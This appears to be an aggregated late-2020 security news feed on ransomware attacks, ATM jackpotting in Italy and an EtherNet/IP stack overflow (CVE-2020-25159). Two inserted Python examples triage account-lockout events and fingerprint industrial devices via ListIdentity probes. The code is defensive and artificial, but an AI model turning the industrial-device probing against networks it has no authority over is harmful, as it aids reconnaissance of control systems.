Digital ID needs to be ‘as easy as Uber’ says Ontario Digital Service deputy minister

Ontario is the latest province to signal its intent to allow citizens to prove their identity with the help of a digital wallet, but experts say a lot of work remains before the service can be widely used.

The post Digital ID needs to be 'as easy as Uber' says Ontario Digital Service deputy minister first appeared on IT World Canada.

Quick Guide — How to Troubleshoot Active Directory Account Lockouts

Active Directory account lockouts can be hugely problematic for organizations. There have been documented instances of attackers leveraging the account lockout feature in a type of denial of service attack. By intentionally entering numerous bad passwords, attackers can theoretically lock all of the users out of their accounts. But what do you do if you are experiencing problems with account
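The first step in any lockout investigation is to pull the 4740 (account locked out) events and find which caller computer is generating them, because that is what separates a stale cached credential on one workstation from the deliberate lockout denial of service described above. The Python below is an added example written for this page, not code from the guide it excerpts. It parses 4740 records in the Windows event XML layout (the records here are constructed sample data), reads the `TargetDomainName` field as the caller computer name, which is how the 4740 event data maps to the "Caller Computer Name" shown in Event Viewer, groups lockouts by caller, and flags any caller that locks several distinct accounts inside a short window. The five-minute window and the three-account threshold are assumptions to tune for your domain.

```python
"""Triage Windows Security event 4740 records to find the source of account lockouts.

Added example for this page (not the original guide's code). Sample records are
constructed; the window/threshold defaults are assumptions to tune.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def make_4740(system_time, target_user, caller_computer):
    """Build a constructed 4740 record in the Windows event XML layout (sample data only)."""
    return f"""<Event xmlns="{NS['e']}">
  <System><EventID>4740</EventID><TimeCreated SystemTime="{system_time}"/></System>
  <EventData>
    <Data Name="TargetUserName">{target_user}</Data>
    <Data Name="TargetDomainName">{caller_computer}</Data>
    <Data Name="SubjectUserName">DC01$</Data>
  </EventData>
</Event>"""


# Constructed sample: one workstation repeatedly locking a single user (stale credential)
# and one host locking three different accounts within seconds (deliberate lockout DoS).
SAMPLE_4740 = [
    make_4740("2020-11-30T08:00:01Z", "alice", "WKS-042"),
    make_4740("2020-11-30T08:31:10Z", "alice", "WKS-042"),
    make_4740("2020-11-30T09:12:00Z", "bob", "ATTACKER-PC"),
    make_4740("2020-11-30T09:12:04Z", "carol", "ATTACKER-PC"),
    make_4740("2020-11-30T09:12:09Z", "dave", "ATTACKER-PC"),
]


def parse_4740(xml_text):
    """Return (time, locked account, caller computer), or None if the record is not a 4740."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    if system is None or int(system.find("e:EventID", NS).text) != 4740:
        return None
    stamp = system.find("e:TimeCreated", NS).get("SystemTime")
    # Windows writes 100 ns fractions; drop the fraction before parsing.
    when = datetime.strptime(stamp.rstrip("Z").split(".")[0], "%Y-%m-%dT%H:%M:%S")
    data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
    # In event 4740, TargetDomainName carries the "Caller Computer Name" shown in Event Viewer.
    return when, data.get("TargetUserName", ""), data.get("TargetDomainName", "")


def lockout_report(xml_records, window=timedelta(minutes=5), min_accounts=3):
    """Group lockouts by caller computer; flag callers that lock >= min_accounts distinct
    accounts inside `window`, the signature of a deliberate lockout denial of service."""
    by_caller = defaultdict(list)
    for record in xml_records:
        parsed = parse_4740(record)
        if parsed:
            when, user, caller = parsed
            by_caller[caller].append((when, user))

    report = {}
    for caller, hits in by_caller.items():
        hits.sort()
        burst = False
        for i, (start, _) in enumerate(hits):
            accounts_in_window = {u for t, u in hits[i:] if t - start <= window}
            if len(accounts_in_window) >= min_accounts:
                burst = True
                break
        report[caller] = {
            "lockouts": len(hits),
            "accounts": sorted({u for _, u in hits}),
            "burst": burst,
        }
    return report


if __name__ == "__main__":
    for caller, info in lockout_report(SAMPLE_4740).items():
        flag = "POSSIBLE LOCKOUT DoS" if info["burst"] else "likely stale credential"
        print(f"{caller}: {info['lockouts']} lockouts of {info['accounts']} -> {flag}")
```

On a real domain, export the records on the PDC emulator, since every lockout is relayed there, with `wevtutil qe Security /q:"*[System[EventID=4740]]" /f:xml`, and pass each `<Event>` element to `lockout_report`. One caller repeatedly locking a single account is almost always a stale credential (a mapped drive, scheduled task or service) on that host; one caller locking many accounts within seconds is the denial-of-service case and the host should be isolated before the lockouts are cleared.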

Cyber Security Today – Executives email passwords for sale, a ransomware attack on industrial systems manufacturer and online shopping tips

Today's podcast warns that the passwords of hundreds of executives are being sold to hackers, and reports on a ransomware attack on Advantech

The post Cyber Security Today - Executives email passwords for sale, a ransomware attack on industrial systems manufacturer and online shopping tips first appeared on IT World Canada.

Cyber security statistics for small organisations

No matter what size your organisation is, it will suffer a cyber attack sooner or later. There are simply too many malicious actors and too many vulnerabilities for you to identify.

Unfortunately, SMEs often fall into the trap of believing that they are too small to be on cyber criminals’ radars. Why would they even think to target you?

But criminal hackers target vulnerabilities rather than specific organisations. They look for weaknesses – whether it’s a flaw in a piece of software or an unprotected database containing sensitive information – and leverage it in whatever way they can.

That’s why small organisations need to be as concerned about cyber security as huge corporations. As we explain in our new infographic, 14 Cyber Security Statistics for SMEs, 43% of all cyber attacks occur at small organisations.

Here are some other stats from the infographic:

  • A small business is hacked every 19 seconds
  • 19% of businesses said the attack prevented staff from working
  • The average cost of a cyber attack increased by 61% last year, from £184,000 to £296,500
  • 70% of organisations said that remote working increases the risk of a data breach
  • Phishing attacks are the most common cause of a data breach

You can download the full infographic for free to remind you and your team of the cyber security risks that small organisations face.

The help you need with IT Governance

Most small organisations know that they should be doing more to protect themselves, but it can be difficult knowing where to begin.

That’s why, according to a Skurio report, 50% of organisations in the UK are considering outsourcing their cyber security.

This approach ensures that you get expert guidance when you need it and without the hassle of finding and appointing someone with the versatility to address whatever security issues you face.

Those considering this as a solution should take a look at our Cyber Security as a Service. With this annual subscription, you’ll receive the support you need whenever it’s necessary.

Our team will advise you on the best way to protect your organisation and guide you through essential processes such as vulnerability scans, staff training and the creation of data protection policies.

This service contains everything you need in one place, giving you the peace of mind that you’re doing everything possible to stay secure.

The post Cyber security statistics for small organisations appeared first on IT Governance UK Blog.

Company Director Disqualified After Nuisance Calls

The director of a marketing company that made tens of thousands of nuisance calls has been banned from running a business for six years.

Elia Bols was director of AMS Marketing Limited, a firm founded in 2016 which was the subject of scores of complaints between October that year and October 2017.

UK regulator the Information Commissioner’s Office handed Bols a fine of £100,000 after judging that, under his direction, the firm had made over 75,000 nuisance calls. It should first have used the Telephone Preference Service (TPS) list of individuals who choose not to receive unsolicited contact, the ICO said.

AMS Marketing was wound-up in 2019, with the fine still outstanding, and Bols now lives in Australia. However, in his absence, the government has ruled that AMS Marketing broke Regulation 21 of the Privacy and Electronic Communications Regulations (PECR).

As a result, he is now disqualified from acting as director or becoming directly or indirectly involved with running or promoting a company.

“Our work with the Insolvency Service has seen the successful disqualification of 17 directors who have shut their business down to try and avoid paying a fine for illegal marketing activity,” explained Andy Curry, head of investigations at the ICO.

“Nuisance calls, emails and texts can be a huge problem and often cause people real distress. By taking unscrupulous directors out of action, we can help protect the public and their privacy.”

However, despite these successes, the ICO has been found wanting in terms of its collection of outstanding fines from such offenders.

An FOI request last month revealed that £6.6m, or over 39% of total fines, are still outstanding. Just 13% of nuisance calls fines were collected, versus 54% of data breach penalties.

University of Vermont Medical Center has yet to fully recover from October cyber attack

The University of Vermont Medical Center has yet to fully recover from a cyber attack that crippled systems at the Burlington hospital.

In October, ransomware operators hit the Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network. The ransomware attack took place on October 28 and disrupted services at the UVM Medical Center and affiliated facilities.

The ransomware attack has had varying impacts across the network’s affiliates.

A month later, the University of Vermont Medical Center is continuing to recover from the cyber attack that paralyzed the systems at the Burlington hospital.

The hospital announced that it had restored access to its main electronic records system only on Tuesday.

“The restoration includes inpatient and ambulatory sites at the UVM Medical Center and ambulatory clinics at Central Vermont Medical Center in Berlin, Porter Medical Center in Middlebury and Champlain Valley Physicians Hospital in Plattsburgh, New York.” reported the Associated Press.

Unfortunately, the hospital’s IT staff are still working to restore access, and the operation could take additional time to complete.

At the time of this writing, hospital officials ruled out that threat actors had compromised any personal information about patients.

In October, news of the attack came a few hours after the FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Health and Human Services (HHS) issued a joint alert warning hospitals and healthcare providers of imminent ransomware attacks from Russia.

This security advisory describes the tactics, techniques, and procedures (TTPs) associated with cyber criminals that could target organizations in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware.

At the time of the alert, the agencies had received information about imminent attacks in which threat actors were using the TrickBot botnet to deliver the ransomware to infected systems.

Pierluigi Paganini

(SecurityAffairs – hacking, Vermont Medical Center)

The post University of Vermont Medical Center has yet to fully recover from October cyber attack appeared first on Security Affairs.

Fired CISA Director Refutes Election Fraud Allegations

In 60 Minutes Interview, Christopher Krebs Says Paper Ballots Secured Election
Ex-CISA director Christopher Krebs revealed in a 60 Minutes interview exactly what made officials confident that the election results were accurate: paper ballots. Krebs didn't mention President Trump by name, but refuted claims by his administration and personal lawyer, Rudy Giuliani, that the election was corrupt.

MasterChef Producer Hit by Double Extortion Ransomware

A multibillion-dollar TV production company has become the latest big corporate name caught out by ransomware, it emerged late last week.

French multinational firm Banijay SAS owns over 120 production firms around the world, delivering TV shows ranging from MasterChef and Big Brother to Black Mirror and The Island with Bear Grylls.

In a short update last Thursday, it claimed to be managing a “cyber-incident” affecting the networks of Endemol Shine Group and Endemol Shine International, Dutch firms it acquired in a $2.2bn deal in July.

Although ransomware isn’t named in the notice, previous reports suggest the firm is being extorted.

It admitted that data may have been taken, in what would be a classic “double extortion” attack.

“The business has reason to believe certain personal data of current and ex-employees may have been compromised, as well as commercially sensitive information,” it said.

“We are continuing to take the appropriate steps and remain committed to protecting our employees, past and present, so if we do identify any cases of data being taken or misused, we will contact the affected individuals directly.”

In the meantime, the firm said it is investigating the attack with “independent specialists” and has notified the relevant authorities in the Netherlands and the UK: the two countries affected by the incident.

Banijay would do well not to engage with the extortionists. A recent Coveware report warned that “paying a threat actor not to leak stolen data provides almost no benefit to the victim.”

The vendor claimed that several ransomware groups still publicly dox companies even after payment, while others may demand a second payment to remove any data they may have stolen.

Victim organizations should in any case assume that stolen data has been or will be either sold to other threat actors or used in a future extortion attempt, Coveware claimed.

Delaware County, Pennsylvania, opted to pay 500K ransom to DoppelPaymer gang

Delaware County, Pennsylvania opted to pay a $500,000 ransom after it was the victim of a DoppelPaymer ransomware attack last weekend.

Last weekend, Delaware County, Pennsylvania, was the victim of a DoppelPaymer ransomware attack that brought down part of its network.

According to local media, the ransomware operators have compromised systems containing sensitive information, including police reports and payroll.

“Sources told Action News, the cybercriminals gained control of the network on Saturday encrypting files, including police reports, payroll, purchasing, and other databases. Prosecution evidence, however, has not been affected.” reads the post published by Philadelphia’s 6abc’s Action News.

“Sources said the county is in the process of paying the $500,000 ransom as it’s insured for such attacks.”

The infection did not impact the Bureau of Elections and the County’s Emergency Services Department.

The incident was disclosed on Monday and now Delaware County has paid a $500,000 ransom.

“The County of Delaware recently discovered a disruption to portions of its computer network. We commenced an immediate investigation that included taking certain systems offline and working with computer forensic specialists to determine the nature and scope of the event. We are working diligently to restore the functionality of our systems,” states the incident notice published by Delaware County. “The investigation is ongoing and we are working with computer forensic specialists to understand the full nature and scope of the event and confirm accurate information before sharing the details.”

The notice also confirmed that county employees have already been notified and that the FBI is investigating the attack.

BleepingComputer was informed that the Delaware County was hit by the DoppelPaymer ransomware gang.

“BleepingComputer was also told that the ransomware gang advised Delaware County to change all of their passwords and modify their Windows domain configuration to include safeguards from the Mimikatz program.” reported BleepingComputer.

A few days ago, the Microsoft Security Response Center (MSRC) warned customers about the DoppelPaymer ransomware and provided useful information on the threat and how it spreads.

In November, the Mexican state-owned oil company Petróleos Mexicanos (Pemex) was infected with the DoppelPaymer ransomware.

Early November, the DoppelPaymer ransomware disrupted IT operations in the territory of Nunavut (Canada), all government services requiring access to electronic data were impacted.

The TA505 cybercrime group, known for distributing the Dridex Trojan and the Locky ransomware, released the BitPaymer ransomware (aka FriedEx) in mid-2017. BitPaymer was used in attacks against high-profile targets and organizations and was distributed through Remote Desktop Protocol (RDP) brute-force attacks.

In July, CrowdStrike experts found a new variant of the ransomware, tracked as DoppelPaymer. The discovery suggests that some members of the TA505 gang left the group and forked the source code of both Dridex and BitPaymer to develop the new malware.

Both BitPaymer and DoppelPaymer have continued to operate in parallel since then.

Other victims of the DoppelPaymer are the City of Torrance in California, the Hall County, Georgia, Newcastle University, Banijay Group SAS, Bretagne Télécom, Compal, and Visser Precision.

Pierluigi Paganini

(SecurityAffairs – hacking, DoppelPaymer)

The post Delaware County, Pennsylvania, opted to pay 500K ransom to DoppelPaymer gang appeared first on Security Affairs.

How do I select a pentesting solution for my business?

Given the number of vulnerabilities that have gone global in the past few years, enterprises can’t afford to keep relying on reactive security. Just hoping that an alert doesn’t go off isn’t a strategy. Instead, groups should embrace penetration testing. For those unfamiliar with the concept, a typical pentest project consists of a pentester putting on their “evil person” hat and attacking a target, looking to infiltrate the organization in the way that a malicious … More

The post How do I select a pentesting solution for my business? appeared first on Help Net Security.

Review: The Perfect Weapon

John Maggio, an award-winning producer, director, and writer, known for The Newspaperman: The Life and Times of Ben Bradlee (2017), Panic (2018), The Italian Americans (2015) and others, based this documentary on the homonymous best-selling book by David E. Sanger. The Perfect Weapon Released at the peak of the US 2020 election campaign and just before the election itself, the documentary examines the harsh reality of today’s conflicts between nations, relying not so much on … More

The post Review: The Perfect Weapon appeared first on Help Net Security.

Pandemic thinking: What if there were a vaccine for OT ransomware?

The year 2020 has been defined globally by the COVID-19 pandemic. One of few silver linings for this difficult set of circumstances is innovation – redesigning normal processes so that life can carry on with some degree of regularity and reliability. Pre-COVID, we all took certain risks routinely, and the consequences were minor. Now the consequences are much more serious and we respond to these risks by very carefully deciding how we expose ourselves to … More

The post Pandemic thinking: What if there were a vaccine for OT ransomware? appeared first on Help Net Security.

New wave of affordable silicon leading to greater IoT project success

With up to 75 percent of remote device management projects deemed “not successful” in 2020, IoT deployment has been limited in realizing its full potential. Path to IoT project success However, a new wave of affordable silicon that provides a wide array of features and functionality, in conjunction with the maturation of pre-packaged software, will lead to a substantial increase in IoT project success in the upcoming year, predict experts at Sequitur Labs. According to … More

The post New wave of affordable silicon leading to greater IoT project success appeared first on Help Net Security.

Hacking Christmas Gifts: Putting IoT Under the Microscope

If high-tech gadgets are on your holiday shopping list, it is worth taking a moment to think about the particular risks they may bring. Under the wrong circumstances, even an innocuous gift may introduce unexpected vulnerabilities. In this blog series, VERT will be looking at some of the Internet’s best-selling holiday gifts with an eye […]… Read More

The post Hacking Christmas Gifts: Putting IoT Under the Microscope appeared first on The State of Security.

84% of global decision makers accelerating digital transformation plans

Unit4 surveyed business and IT decision makers and users working in service industries in August and September 2020, to understand how well organizations are embracing innovation and adapting to the challenges of the pandemic. Growing people-centric innovation The study shows that 84% of global decision makers are accelerating their digital transformation plans, in response to growing demands from users, who want more flexibility to work remotely in the future. During COVID-19, global decision makers cited … More

The post 84% of global decision makers accelerating digital transformation plans appeared first on Help Net Security.

Secure Configuration in the Cloud – IaaS, PaaS and SaaS Explained

If I asked you what security products you had in place to manage risk within your IT organisation 10 years ago, you would probably list half a dozen different tools and confidently note that most of your infrastructure was covered by a set of key products such as antivirus, DLP, firewalls, etc. But in a world […]… Read More

The post Secure Configuration in the Cloud – IaaS, PaaS and SaaS Explained (Configuración segura en la nube – Explicación de IaaS, PaaS y SaaS) appeared first on The State of Security.

HD-PLC Alliance to create the IEEE P1901b standard for using HD-PLC in smart grids and factories

HD-PLC Alliance has started standardization work that will allow the use of enhanced network security functions, with the aim of using High-Definition Power Line Communication (hereinafter referred to as HD-PLC) technology in the fields of smart grids and distributed power management. HD-PLC technology has already been standardized as IEEE 1901 (Broadband over Power Line Networks for MAC and PHY) by the IEEE Standards Association. This technology is particularly attracting attention in Europe as a communication … More

The post HD-PLC Alliance to create the IEEE P1901b standard for using HD-PLC in smart grids and factories appeared first on Help Net Security.

Microsoft Azure Databricks receives FedRAMP ATO

Databricks announced that Microsoft Azure Databricks has received a Federal Risk and Authorization Management Program (FedRAMP) High Authority to Operate (ATO). This authorization validates Azure Databricks security and compliance for high-impact data analytics and AI across a wide range of public sector, industry, and enterprise use cases. FedRAMP is a standardized approach to security assessment, authorization, and continuous monitoring for cloud services as defined by the National Institute of Standards and Technology (NIST). The ATO … More

The post Microsoft Azure Databricks receives FedRAMP ATO appeared first on Help Net Security.

Crooks stole 800,000€ from ATMs in Italy with Black Box attack

A cyber criminal organization has stolen money from at least 35 Italian ATMs with a black box attack technique.

A criminal organization has stolen money from at least 35 ATMs and Post Office cash dispensers operated by Italian banks with a new black box attack technique.

The Carabinieri of Monza dismantled the gang; the Italian law enforcement agency confirmed that the cybercrime organization stole about €800,000 in just seven months using ATM black box attacks.

The Italian Carabinieri identified 12 people: six have already been arrested, three are currently held in custody in Poland, one returned to Moldova before being stopped and two may no longer be on Italian territory.

According to local media, the gang had numerous logistical bases in the provinces of Milan, Monza, Bologna, Modena, Rome, Viterbo, Mantua, Vicenza and Parma.

Black box attacks are a type of jackpotting attack aimed at forcing an ATM to dispense the cash by sending a command through a “black box” device.

In this attack, a black box device, such as a mobile device or a Raspberry Pi, is physically connected to the ATM (typically to the cash dispenser’s communication interface after the case is opened) and is used by the attackers to send dispense commands to the machine.

The ATM black box attacks are quite popular in the cybercrime underground and several threat actors offer the hardware equipment and malware that could be used to compromise the ATMs.

Below is the list of compromised ATMs (date – operator – location; dates normalized to YYYY-MM-DD from the mixed formats in the source):

  • 2020-07-12 – UFF PP TT – BELLUSCO
  • 2020-07-16 – BANCA POPOLARE DI NOVARA – CRODO
  • 2020-07-18 – BPM – WEEKLY
  • 2020-07-20 – BPM – MORAZZONE
  • 2020-08-03 – UFF PP TT – SANT’ILARIO D’ENZA
  • 2020-08-04 – CASSA DI RISPARMIO – SAONARA
  • 2020-08-05 – UFF PP TT – CARUGATE
  • 2020-08-08 – UFF PP TT – PESSANO CON BORNAGO
  • 2020-08-18 – UFF PP TT – SEVESO
  • 2020-08-19 – UFF PP TT – FAGNANO OLONA
  • 2020-08-21 – BBPM – COMO
  • 2020-08-27 – BANCA INTESA – GRONTARDO
  • 2020-09-01 – BBPM – BREMBATE DI SOPRA
  • 2020-09-01 – UFF PP TT – SIZIANO
  • 2020-09-02 – UFF PP TT – MELZO
  • 2020-09-04 – UFF PP TT – CARATE BRIANZA
  • 2020-09-07 – UFF PP TT – SENAGO
  • 2020-09-11 – UFF PP TT – BRESCIA
  • 2020-09-11 – BPM – PARMA
  • 2020-09-14 – UFF PP TT – BUSNAGO
  • 2020-09-18 – BBPM – ROZZANO
  • 2020-09-18 – BBPM – CARONNO PERTUSELLA
  • 2020-09-21 – UFF PP TT – GHEDI
  • 2020-09-22 – BBPM – CASARILE
  • 2020-09-24 – BBPM – MACHERIO
  • 2020-09-30 – BBPM – RESCALDINA
  • 2020-09-30 – BBPM – LIMENA
  • 2020-10-21 – VOLKS – VILLAVERLA
  • 2020-10-22 – UNICREDIT – GRISIGNANO DI ZOCCO
  • 2020-10-28 – BANCO S. MARCO – SPINEA
  • 2020-10-30 – BANCA CAMBIANO – MONTELUPO FIORENTINO
  • 2020-11-06 – BBPM – BIASSONO
  • 2020-11-08 – BBPM – SANTO STEFANO TICINO
  • 2020-11-10 – BCC – CAPANNELLE JUNCTION (RM)
  • 2020-11-11 – UFF PP TT – VERMICINO-FRASCATI

Poorly protected ATMs are more exposed to this type of attack because crooks can easily tamper with their case in order to connect the mobile device.

In July, Diebold Nixdorf, a leading manufacturer of ATMs, issued an alert to customers warning all banks of a new variant of ATM black box or jackpotting attacks. The alert was issued after Argenta Bank in Belgium was forced to shut down 143 ATMs following a jackpotting attack.

All the compromised machines were Diebold Nixdorf ProCash 2050xe devices. This was the first time Belgian authorities had observed this criminal practice in the country.

According to the security alert issued by Diebold Nixdorf, and obtained by ZDNet, the new variation of black box attacks has been used in certain countries across Europe.

Pierluigi Paganini

(SecurityAffairs – hacking, black box attack)

The post Crooks stole 800,000€ from ATMs in Italy with Black Box attack appeared first on Security Affairs.

A critical flaw in industrial automation systems opens to remote hack

Experts found a critical flaw in Real-Time Automation’s (RTA) 499ES EtherNet/IP stack that could allow hacking industrial control systems.

Tracked as CVE-2020-25159, the flaw is rated 9.8 out of 10 in severity by the industry-standard Common Vulnerability Scoring System (CVSS) and impacts all versions of EtherNet/IP Adapter Source Code Stack prior to 2.28, which was released on November 21, 2012.

Security researchers from security company Claroty have discovered a critical flaw in Real-Time Automation’s (RTA) 499ES EtherNet/IP (ENIP) stack that could be exploited by a remote attacker to hack the industrial control systems.

“Claroty has privately disclosed details to Real Time Automation (RTA), informing the vendor of a critical vulnerability in its proprietary 499ES EtherNet/IP (ENIP) stack. The vulnerability could cause a denial-of-service situation, and depending on other conditions, could expose a device running older versions of the protocol to remote code execution.” reads the security advisory published by Claroty.

RTA’s ENIP stack is widely implemented in industrial automation systems.

Claroty’s Brizinov reported the stack overflow issue to the US agency CISA, which published a security advisory.

“Successful exploitation of this vulnerability could cause a denial-of-service condition, and a buffer overflow may allow remote code execution,” reads the advisory published by the US cybersecurity and infrastructure agency (CISA). “The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to send a specially crafted packet that may result in a denial-of-service condition or code execution.”

Experts used search engines for Internet-connected devices, such as Shodan.io, to look for ENIP-compatible internet-facing devices and discovered more than 8,000 systems exposed online.

Experts warn that vendors may have bought vulnerable versions of this stack before the 2012 update and are still using it in their firmware.

“However, many vendors may have bought vulnerable versions of this stack prior to the 2012 update, starting in the early 2000s when it was first issued, and integrated it into their own firmware. This would leave many running in the wild still today.” continues the report.

“Claroty researchers were able to scan 290 unique ENIP-compatible devices, which identified 32 unique ENIP stacks. Eleven devices were found to be running RTA’s ENIP stack in products from six unique vendors.”
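Claroty’s stack fingerprinting above rests on the fact that an EtherNet/IP device answers a ListIdentity request with its vendor ID, product code, product name and firmware revision, which is enough to tell which ENIP stack a product is built on. The Python below is an added example written for this page, not RTA’s stack or Claroty’s tooling. It builds the 24-byte ListIdentity request (encapsulation command 0x63) that scanners send to TCP port 44818, and parses a reply the way a hardened stack should: the header’s declared length is compared with the bytes actually received, and every item length and the product-name string length are checked against their enclosing buffer before anything is read. Skipping exactly that class of check is what lets a specially crafted packet turn into the stack-based buffer overflow CISA describes. The reply it parses is constructed inline; the device name, vendor ID and other field values are made up for the example.

```python
"""Build an EtherNet/IP ListIdentity request and parse the reply with full length checks.

Added example for this page (not RTA's stack or Claroty's scanner). The reply is
constructed inline; its field values are invented for the example.
"""
import struct
from ipaddress import IPv4Address

# Encapsulation header, little-endian, 24 bytes:
# command, length, session handle, status, sender context (8 bytes), options.
ENIP_HEADER = struct.Struct("<HHIIQI")
CMD_LIST_IDENTITY = 0x0063
ITEM_IDENTITY = 0x000C      # Common Packet Format item type carrying the identity object
IDENTITY_MIN_LEN = 34       # 32 fixed bytes + name length byte + state byte


class EnipError(ValueError):
    """Raised for any reply whose declared lengths do not fit the bytes received."""


def build_list_identity_request():
    """Header-only probe (no payload) that scanners send to TCP/UDP 44818."""
    return ENIP_HEADER.pack(CMD_LIST_IDENTITY, 0, 0, 0, 0, 0)


def build_list_identity_reply(ip, port, vendor, device_type, product_code,
                              revision, status, serial, name, state=3):
    """Constructed reply in the shape a real adapter returns (sample data for the example)."""
    name_b = name.encode("ascii")
    item = struct.pack("<H", 1)                                               # protocol version
    item += struct.pack(">HH4s8s", 2, port, IPv4Address(ip).packed, bytes(8))  # sockaddr_in, big-endian
    item += struct.pack("<HHHBBHI", vendor, device_type, product_code,
                        revision[0], revision[1], status, serial)
    item += bytes([len(name_b)]) + name_b + bytes([state])                   # SHORT_STRING name, state
    payload = struct.pack("<HHH", 1, ITEM_IDENTITY, len(item)) + item        # item count, type, length
    return ENIP_HEADER.pack(CMD_LIST_IDENTITY, len(payload), 0, 0, 0, 0) + payload


def parse_list_identity(packet):
    """Parse a ListIdentity reply, refusing any length that runs past the data received."""
    if len(packet) < ENIP_HEADER.size:
        raise EnipError("truncated encapsulation header")
    command, length, _session, status, _ctx, _opts = ENIP_HEADER.unpack_from(packet)
    if command != CMD_LIST_IDENTITY:
        raise EnipError(f"unexpected command 0x{command:04x}")
    if status != 0:
        raise EnipError(f"encapsulation status 0x{status:08x}")
    payload = packet[ENIP_HEADER.size:]
    # The declared length is attacker-controlled. Copying `length` bytes into a fixed
    # buffer without comparing it to what actually arrived is the shape of a stack overflow.
    if length != len(payload):
        raise EnipError(f"declared length {length} != received {len(payload)}")
    if len(payload) < 2:
        raise EnipError("missing item count")
    (item_count,) = struct.unpack_from("<H", payload, 0)
    offset = 2
    for _ in range(item_count):
        if offset + 4 > len(payload):
            raise EnipError("item header runs past payload")
        item_type, item_len = struct.unpack_from("<HH", payload, offset)
        offset += 4
        if offset + item_len > len(payload):
            raise EnipError("item length runs past payload")
        item = payload[offset:offset + item_len]
        offset += item_len
        if item_type == ITEM_IDENTITY:
            return parse_identity_item(item)
    raise EnipError("no identity item in reply")


def parse_identity_item(item):
    """Decode the identity item; the product name is a length-prefixed SHORT_STRING."""
    if len(item) < IDENTITY_MIN_LEN:
        raise EnipError("identity item too short")
    (proto_ver,) = struct.unpack_from("<H", item, 0)
    _family, port, addr = struct.unpack_from(">HH4s", item, 2)
    (vendor, device_type, product_code,
     rev_major, rev_minor, dev_status, serial) = struct.unpack_from("<HHHBBHI", item, 18)
    name_len = item[32]
    # The one-byte string length must leave room for the trailing state byte.
    if 33 + name_len + 1 > len(item):
        raise EnipError("product name length runs past item")
    name = item[33:33 + name_len].decode("ascii", "replace")
    return {
        "protocol_version": proto_ver,
        "ip": str(IPv4Address(addr)),
        "port": port,
        "vendor_id": vendor,
        "device_type": device_type,
        "product_code": product_code,
        "revision": f"{rev_major}.{rev_minor}",
        "status": dev_status,
        "serial": serial,
        "product_name": name,
        "state": item[33 + name_len],
    }


# Constructed sample reply (all values invented for the example).
SAMPLE_REPLY = build_list_identity_reply("192.0.2.10", 44818, 1, 12, 7, (2, 1),
                                         0x0030, 0xDEADBEEF, "Example Adapter")

if __name__ == "__main__":
    print(parse_list_identity(SAMPLE_REPLY))
```

To inventory your own plant, send `build_list_identity_request()` to each candidate host on TCP 44818 and pass the reply to `parse_list_identity`; the vendor ID, product code and revision together identify the stack and let you match a device against the affected-versions list. Any reply that raises `EnipError` is worth a closer look, since a device that sends inconsistent lengths is either broken or hostile.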

Operators have to update to current versions of the ENIP stack to address the vulnerability. CISA provided the following recommendations to minimize the risk of exploitation of this vulnerability:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Pierluigi Paganini

(SecurityAffairs – hacking, industrial automation systems)

The post A critical flaw in industrial automation systems opens to remote hack appeared first on Security Affairs.

Security Affairs newsletter Round 291

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

A cyberattack crippled the IT infrastructure of the City of Saint John
Hundreds of female sports stars and celebrities have their naked photos and videos leaked online
Romanians arrested for running underground malware services
Threat actor shared a list of 49,577 IPs of vulnerable Fortinet VPNs
Computer Security and Data Privacy, the perfect alliance
FBI issued an alert on Ragnar Locker ransomware activity
Massive threat campaign strikes open-source repos, Sonatype spots new CursedGrabber malware
TikTok fixed security issues that could have led one-click account takeover
VMware discloses critical zero-day CVE-2020-4006 in Workspace One
VMware fixed SD-WAN flaws that could allow hackers to target enterprise networks
2FA bypass in cPanel potentially exposes tens of millions of websites to hack
A new Stantinko Bot masqueraded as httpd targeting Linux servers
Baidu Android apps removed from Play Store after being caught collecting user details
Credential stuffing attack targeted 300K+ Spotify users
Crooks social-engineered GoDaddy staff to take over crypto-biz domains
Microsoft fixes Kerberos Authentication issues with an out-of-band Update
TrickBot operators continue to update their malware to increase resilience to takedown
Belden discloses data breach as a result of a cyber attack
Group-IB Hi-Tech Crime Trends 2020/2021 report
Operation Falcon: Group-IB helps INTERPOL identify Nigerian BEC ring members
Retail giant Home Depot agrees to a $17.5 million settlement over 2014 data breach
UK NCSC’s alert urges orgs to fix MobileIron CVE-2020-15505 RCE
Watch out, WAPDropper malware could subscribe you to premium services
A zero-day in Windows 7 and Windows Server 2008 has yet to be fixed
Carding Action 2020: Group-IB supports Europol-backed operation saving €40 million
Danish news agency Ritzau hit by ransomware, but did not pay the ransom
Ransomware hits US Fertility, the largest US fertility network
Sophos notifies customers of a data leak after a misconfiguration
SSH-backdoor Botnet With ‘Research’ Infection Technique
A week later, Manchester United has yet to recover after a cyberattack
Canon publicly confirms August ransomware attack and data breach
Details of 16 million Brazilian COVID-19 patients exposed online
Drupal emergency updates fix critical arbitrary PHP code execution
North Korean hackers allegedly behind cyberattacks on AstraZeneca
The global impact of the Fortinet 50,000 VPN leak posted online
Chip maker Advantech hit by Conti ransomware gang
Hundreds of C-level executives credentials available for $100 to $1500 per account
Office 365 phishing campaign leverages Oracle and Amazon cloud services

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 291 appeared first on Security Affairs.

Sopra Steria estimates financial Impact of ransomware attack could reach €50 Million

IT services provider Sopra Steria estimates that a recent ransomware attack will have a financial impact ranging between €40M and €50M.

At the end of October, French IT outsourcer Sopra Steria was hit by a ransomware attack. While the company did not reveal the family of malware that infected its systems, local media speculated that the Ryuk ransomware was involved. The European IT firm has 46,000 employees operating in 25 countries worldwide. It provides a wide range of IT services, including software development and consulting.

Now the company estimates that a recent ransomware attack will have a financial impact ranging between €40 million ($48 million) and €50 million ($60 million).

